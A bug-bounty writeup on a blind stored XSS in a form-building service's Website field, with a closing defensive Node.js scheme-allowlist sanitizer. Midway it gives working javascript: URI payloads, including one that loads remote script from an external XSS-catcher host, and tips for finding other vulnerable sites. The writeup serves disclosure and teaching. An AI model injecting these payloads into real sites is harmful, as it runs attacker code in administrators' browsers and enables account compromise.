Hack your form new vector for BXSS

medium.com · devanshbatham/Awesome-Bugbounty-Writeups · 22 hours ago · bug-bounty
AI Summary

A researcher discovered a blind stored XSS vulnerability in a form-building service by bypassing quote filters using the javascript: URI scheme merged with legitimate URLs, allowing arbitrary JavaScript execution on admin pages. The technique leverages acceptance of alternative URI schemes (javascript:https://) combined with rendering in anchor tags to inject payloads that execute when accessed by form creators.

Hack Your Form - New vector for Blind XSS

by Youssef A. Mohamed · ~3 min read · March 12, 2019 (Updated: December 8, 2021)

Hello Pentesters,

I'm Youssef A. Mohamed aka GeneralEG, Security Researcher @ CESPPA, Cyber Security Engineer @ Squnity and SRT Member @ Synack.

Today I'm gonna share a juicy finding with you: bypassing a couple of filters to execute malicious JavaScript easily and achieve a Blind Stored XSS.

"I found this issue in a lot of targets, so I will take one of these programs as an example."

The program is private, so let's call it redacted.com.

Recently I was testing in this program and, after some recon, I found that the website offers a specific service (Create Forms). How does this service work?

1) The creator user creates a form.
2) The creator user shares the link with a visitor.
3) The visitor fills in the form.
4) The filled information becomes available to the form's creator at redacted.com/manager/{Form ID}/

So while testing the "Creating form" functions, I found that there's a Website input. I made a simple form, then opened the form as a visitor.

At first I tried to bypass it the basic way (I thought that if I wrote a website.com?" payload it would execute). So I entered:

https://example.com/?"%22"

( " + URL encoded + HTML entities encoded )

Then I opened the creator account to see what happened. But unfortunately, the filter encoded the double quotes:

https://example.com"%22"

and I noticed that the link was rendered in an a tag.

So I decided to grab a cup of coffee :"D

After a few minutes of deep thinking over my coffee about how I would bypass this one, I decided to start fuzzing this input especially: {Enter Website}

While fuzzing I noticed that the filter accepted test:https://example.com !

Then I tried javascript:https//evil.com and it worked :D "Evil loud laugh"

Now I was sure that there's XSS here, but it needs a real website merged with my payload, so I wrote this one:

javascript:x='http://x.c';alert('xss');//

Finally executed! But wait, we want to make it Blind XSS to attack the real admins (the best scenario). So the last payload was:

javascript:eval('a=document.createElement(\'script\');a.src=\'https://generaleg.xss.ht\';document.body.appendChild(a)');s='https://s.com'

¯\_(ツ)_/¯ That's it!

Notes:

80% of my targets which had the Website input were vulnerable to the same scenario. To make sure your target is vulnerable to the same problem, you need a few steps:

A. Check whether the website accepts other URI schemes like javascript:https://generaleg0x01.com or not.
B. Check whether the website renders your https://generaleg0x01.com in an HTML 'a' tag or not.

In most similar situations, the same payload will work perfectly.

Timeline:
20 December, 2018: Report Submitted
25 December, 2018: Report Reviewed and Triaged
30 December, 2018: Report Resolved & $800 Bounty Awarded

Lessons learned:
Fuzz as much as you can.
Don't try only one technique to bypass the filter; try other techniques too.

Happy Hacking!

#security #blind-xss #cesppa #generaleg #bug-bounty
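The two conditions in steps A and B (any URI scheme accepted, value rendered into an a tag) are what the vulnerable filter got wrong: it encoded quotes but never checked the scheme. As an added defender-side example that is not part of the original post or the affected service, this Node.js snippet shows the fix a form service would apply to that Website input: parse with the WHATWG URL parser and allowlist http/https instead of trying to blocklist characters. The helper names and sample inputs are constructed for this example.

```javascript
// Added example (not the post's or the vendor's code): scheme-allowlist
// validation for a user-supplied "Website" URL that will be rendered as <a href>.
const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

function sanitizeWebsiteUrl(input) {
  // Strip ASCII control characters and surrounding whitespace first: browsers
  // tolerate "java\nscript:" and leading spaces, so a raw string compare is not enough.
  const cleaned = String(input).replace(/[\u0000-\u001F\u007F]/g, '').trim();
  let url;
  try {
    // No base URL on purpose: a bare "example.com" or relative path fails to
    // parse instead of being silently resolved against our own origin.
    url = new URL(cleaned);
  } catch {
    return null;
  }
  // url.protocol is already lower-cased, so "JaVaScRiPt:" is caught here too.
  if (!ALLOWED_SCHEMES.has(url.protocol)) return null; // javascript:, data:, test:, ...
  // Return the parser's normalized form (quotes in the query come back as %22).
  return url.href;
}

// Minimal HTML attribute/text escaping for the rendered link (constructed helper).
function escapeHtml(s) {
  return s.replace(/&/g, '&amp;').replace(/"/g, '&quot;')
          .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Render the creator-facing link; invalid values never reach an href at all.
function renderWebsiteLink(input) {
  const safe = sanitizeWebsiteUrl(input);
  if (safe === null) return '<span>(invalid website)</span>';
  return `<a href="${escapeHtml(safe)}" rel="noopener noreferrer">${escapeHtml(safe)}</a>`;
}

// Constructed probes mirroring the ones in the post.
const SAMPLE_INPUTS = [
  'https://example.com/?"%22"',      // quote probe: accepted, quotes percent-encoded
  'test:https://example.com',        // unknown scheme: rejected
  'javascript:https://example.com',  // javascript: scheme: rejected
  ' JaVaScRiPt:alert(1)',            // case/whitespace variant: rejected
  'example.com',                     // no scheme: rejected
];

for (const s of SAMPLE_INPUTS) console.log(JSON.stringify(s), '->', renderWebsiteLink(s));
```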